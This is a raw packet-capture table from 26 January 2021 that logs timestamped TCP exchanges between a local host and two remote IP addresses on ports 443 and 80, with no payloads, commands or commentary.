Jan 26, 2021 19:44:17.655019045 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.655057907 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.655075073 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.656194925 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.656219959 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.656272888 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.656302929 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.657341957 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.657366037 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.657444954 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.658518076 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.658540964 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.658588886 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.658643007 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.659740925 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.659765959 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.659802914 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.659821987 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.660851955 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.660873890 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.660917997 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.660944939 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.662045002 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.662077904 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.662117958 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.662151098 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.663212061 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.663237095 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.663249016 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.663260937 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.663295984 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.663336992 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.664369106 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.664391041 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.664426088 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.664449930 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.665858984 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.665885925 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.665924072 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.665947914 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.666738987 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.666760921 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.666790962 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.666816950 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.667902946 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.667924881 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.667953014 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.667982101 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.669071913 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.669100046 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.669159889 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.669183969 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.670306921 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.670332909 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.670392036 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.671421051 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.671446085 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.671493053 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.671508074 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.672595978 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.672621012 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.672651052 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.672678947 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.673753023 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.673778057 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.673827887 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.673847914 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.674953938 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.674974918 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.675018072 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.675043106 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.676162004 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.676188946 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.676608086 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.677314997 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.677344084 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.677386045 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.677402020 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.694587946 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.694617033 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.694673061 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.694695950 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.695074081 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.695100069 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.695172071 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.695200920 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.696155071 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.696180105 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.696239948 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.697185040 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.697211981 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.697289944 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.697681904 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.698118925 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.698143005 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.698190928 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.698224068 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.699034929 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.699059963 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.699110031 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.699179888 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.700042009 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.700068951 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.700119972 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.700143099 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.700388908 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.700944901 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.700968981 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.701023102 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.701042891 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.701932907 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.701961994 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.701994896 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.702014923 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.702886105 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.702914000 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.702965021 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.702976942 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.703841925 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.703866005 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.703918934 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.703932047 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.704808950 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.704838037 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.705384016 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.705760956 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.705785036 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.705806971 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.705825090 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.705837965 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.705883980 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.706722021 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.706747055 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.706790924 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.706813097 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.707652092 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.707675934 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.707716942 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.707731962 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.708647013 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.708672047 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.708719015 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.708738089 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.709574938 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.709599972 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.709646940 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.709665060 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.710536003 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.710561991 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.710625887 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.710648060 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.711405993 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.711432934 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.711469889 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.711512089 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.712359905 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.712383986 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.712508917 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.713258982 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.713284016 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.713316917 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.713335991 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.714158058 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.714183092 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.714236021 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.714253902 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.715423107 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.715490103 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.721215963 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.725447893 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.729903936 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.732165098 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:59.486821890 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:44:59.487778902 CET	49762	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:44:59.536020994 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:44:59.536125898 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:44:59.536808968 CET	80	49762	45.138.24.6	192.168.2.7
Jan 26, 2021 19:44:59.536916971 CET	49762	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:44:59.545278072 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:44:59.636166096 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:44:59.999721050 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:44:59.999804020 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.000107050 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.000267029 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.000530005 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.000968933 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.050973892 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.051060915 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.064802885 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.065572023 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.096421003 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.096611977 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.101540089 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.101629972 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.147532940 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.148154974 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.152467012 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.153137922 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.197186947 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.197565079 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.197675943 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.197711945 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.202002048 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.202280045 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.246767998 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.246884108 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.246970892 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.298135042 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.299561977 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.351310015 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.351505995 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.400525093 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.400836945 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.449781895 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.450845957 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.501705885 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.503559113 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.552615881 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.552742958 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.601824045 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.603615999 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.772512913 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.772595882 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.821590900 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.821706057 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.821715117 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.821760893 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.870702028 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.870791912 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.870898962 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.871114016 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.871334076 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.871387005 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.920078993 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.923013926 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:00.971966028 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:00.976356030 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.025268078 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.025352001 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.074275970 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.074457884 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.074556112 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.125261068 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.125292063 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.125410080 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.125852108 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.125880957 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.125966072 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.175518990 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.175677061 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.175770044 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.175841093 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.224906921 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.224977016 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.225047112 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.225068092 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.225332975 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.225378990 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.276474953 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.277178049 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.277268887 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.277724981 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.277755976 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.277784109 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.326586008 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.326670885 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.375674963 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.377603054 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.388676882 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.388753891 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.428431034 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.433728933 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.437712908 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.441713095 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.482898951 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.485661030 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.534792900 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.534935951 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.584119081 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.584240913 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.584343910 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.584378958 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.584429979 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.584489107 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.633512020 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.633599043 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.633629084 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.633688927 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.634057999 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.634129047 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.682735920 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.682826042 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.731842995 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.731947899 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.744875908 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.744970083 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.793914080 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.794018984 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.794034004 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.794087887 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.844712019 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.844847918 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.844901085 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.845016956 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.893909931 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.894033909 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.894120932 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.894184113 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.894465923 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.894536972 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.943639994 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.943680048 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.943727016 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.943766117 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.943877935 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.943936110 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.992839098 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.992944956 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.993280888 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.993364096 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:01.993534088 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:01.993642092 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.042349100 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.042439938 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.042490959 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.042546988 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.042736053 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.042792082 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.092902899 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.092947006 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.093024015 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.093050003 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.093461990 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.093521118 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.143524885 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.143619061 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.194897890 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.195008993 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.244065046 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.244131088 CET	80	49761	45.138.24.6	192.168.2.7
